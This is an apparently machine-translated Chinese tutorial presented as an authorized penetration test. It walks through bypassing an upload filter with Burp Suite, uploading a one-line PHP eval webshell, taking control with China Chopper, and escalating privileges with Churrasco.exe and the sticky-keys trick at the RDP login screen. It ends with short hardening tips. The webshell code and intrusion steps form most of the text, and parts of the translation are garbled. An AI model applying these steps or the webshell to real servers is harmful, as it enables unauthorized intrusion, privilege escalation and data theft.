任务:某公司授权你在其服务器上执行*****。在核心服务器上进行***测试,已知该web服务器的ip地址(10.1.1.178)包含敏感数据。
1。利用网站漏洞获取服务器外壳
2。创建新用户并将权限升级为管理员
3。获取服务器上的关键敏感数据(C:\console)。
本文仅供学习
***进程
1。探测信息
2。利用该漏洞获取管理帐户的密码
3。找到背景
4。登录后台获取web权限
如果存在直接上传漏洞,您可以利用
1。找到上传漏洞
先知道ip地址,然后打开网页访问,在站内找到上传点
上传pony文件出错,只能上传图像文件,只能进行包捕获
首先设置代理
2。代理设置
Google插件代理SwitchySharp设置代理,然后打开burpsuite捕获包,这里不做介绍
软件教学可以百度一下。代理端口应该相同
3。抓取并分析包,并将其更改为上传
开始抓袋子
help.jpg内容
<?phpeval($_POST['hao']);
?>
修改一下再上传。上传成功。
4。获取webshell权限
以上http是小马地址。打开中式菜刀,输入
获取webshell
5。提升管理权限
创建一个新用户并将权限提升到管理员
使用cmd命令获取管理员权限
添加用户hao并让他加入管理员组失败。没有办法,只能用工具来提高这里的权利
上传脚本,然后重命名,将php脚本复制到刚才的脚本中重命名后缀php
我们经常在网站提案中使用这些工具,Churrasco.exe(巴西烤肉)
如果webshell不能执行cmd,那么我们需要上传一个cmd
如果上传cmd后无法添加用户,那么我-我们需要上传软件索要权限
设置终端路径
无法提升权限。没有管理员组
进入远程桌面登录界面,按shift5五次,获取cmdwhoami/all
如果我们找到用户组并加入就可以了
一场图文并茂的***结束了。只是复制敏感数据,让大家觉得***不再神秘。事实上,更高层次的技术也在研究中。下次带上sqlmap注入练习教程。
6。安全建议:从上面的***测试中发现该服务器
1。及时修补系统的安全漏洞
2。细化服务器文件目录权限,杜绝权限漏洞
3。对于上传权限,可以通过修改服务器的配置来防止该漏洞。很多网站允许用户上传一定数量的图片、Flash等。很多时候,为了以后管理方便,网站开发者会把所有上传的文件都放在指定的文件夹里。管理员只需要将该文件夹的执行权限设置为“无”,就可以在一定程度上防范漏洞。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)